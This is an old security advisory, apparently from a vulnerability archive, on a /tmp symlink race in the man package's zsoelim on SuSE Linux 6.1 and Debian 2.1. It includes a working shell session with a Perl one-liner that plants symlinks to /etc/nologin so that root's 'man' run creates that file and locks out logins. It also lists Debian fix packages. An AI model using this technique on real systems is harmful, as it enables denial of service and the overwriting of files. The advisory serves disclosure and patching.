COMMAND

    man, dvips

SYSTEMS AFFECTED

    SuSE Linux 6.1, Debian GNU/Linux 2.1

PROBLEM

    Thomas Fischbacher found following.  With SuSE Linux 6.1 there are
    still a  few programs  around which  blindly create  files in /tmp
    regardless  of  whether  a  symlink  or  something  similarly evil
    already exists in that place.   Among these programs are  'man'and
    'dvips'.   Though it  seems to  be impossible  by now to overwrite
    /etc/passwd with a plain simple /tmp/zman01234aaa symlink  (didn't
    check if the source is race-condition free, though), one can still
    create arbitrary files which do  funny things.  Example (emacs  --
    M-x shell):

        brauneck:~ # whoami
        root
        brauneck:~ # cd /tmp
        brauneck:/tmp # cat /etc/SuSE-release
        SuSE Linux 6.1 (i386)
        VERSION = 6.1
        brauneck:/tmp # rpm -q man
        man-2.3.10-62
        brauneck:/tmp # md5sum /usr/bin/man
        b383967ce695352002f077680e375c62  /usr/bin/man
        brauneck:/tmp # su tf
        tf@brauneck:/tmp > export LS_OPTIONS=''
        tf@brauneck:/tmp > export LS_COLORS=''
        tf@brauneck:/tmp > ls zman*
        ls: zman*: No such file or directory
        tf@brauneck:/tmp > /bin/bash -c "echo $$"
        6056
        tf@brauneck:/tmp > # this gives me a current pid range
        tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'
        tf@brauneck:/tmp > ls -l /tmp/zman06123aaa
        lrwxrwxrwx   1 tf       stud           12 Jun  4 16:28 /tmp/zman06123aaa -> /etc/nologin
        tf@brauneck:/tmp > ls -l /etc/nologin
        ls: /etc/nologin: No such file or directory
        tf@brauneck:/tmp > exit
        brauneck:/tmp # man mmap
        Reformatting mmap(2), please wait...
        WARNING: terminal is not fully functional

        -  (press RETURN)



        MMAP(2)             Linux Programmer's Manual             MMAP(2)


        NAME
               mmap, munmap - map or unmap files or devices into memory

        SYNOPSIS
               #include <unistd.h>
               #include <sys/mman.h>

               #ifdef _POSIX_MAPPED_FILES

               void  *  mmap(void  *start,  size_t length, int prot , int
               flags, int fd, off_t offset);

               int munmap(void *start, size_t length);

               #endif

        DESCRIPTION

         Manual page mmap(2) line 1q

        brauneck:/tmp # brauneck:/tmp #
        brauneck:/tmp # ls -la /etc/nologin
        -rw-r--r--   1 root     root         4319 Jun  4 16:30 /etc/nologin
        brauneck:/tmp # ls /tmp/zman0* | wc -l
            999
        brauneck:/tmp # # Note that one link was removed!
        brauneck:/tmp #

SOLUTION

    SuSE confirmed  the link  vulnerablity in  the man  package.   The
    culprit is  zsoelim which  creates the  file without  looking left
    and right.   All linux  distributions using  man 2.3.10  should be
    affected.  A fixed package from us will be available soon.

    Debian GNU/Linux 2.1 has  a vulnerability in the  zsoelim program:
    it is  vulnerable to  a symlink  attack.   This has  been fixed in
    version 2.3.10-69FIX.1:

        http://security.debian.org/dists/stable/updates/source/man-db_2.3.10-69FIX.1.diff.gz
        http://security.debian.org/dists/stable/updates/source/man-db_2.3.10-69FIX.1.dsc
        http://security.debian.org/dists/stable/updates/source/man-db_2.3.10.orig.tar.gz

        http://security.debian.org/dists/stable/updates/binary-alpha/man-db_2.3.10-69FIX.1_alpha.deb

        http://security.debian.org/dists/stable/updates/binary-i386/man-db_2.3.10-69FIX.1_i386.deb

        http://security.debian.org/dists/stable/updates/binary-m68k/man-db_2.3.10-69FIX.1_m68k.deb

        http://security.debian.org/dists/stable/updates/binary-sparc/man-db_2.3.10-69FIX.1_sparc.deb

        ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/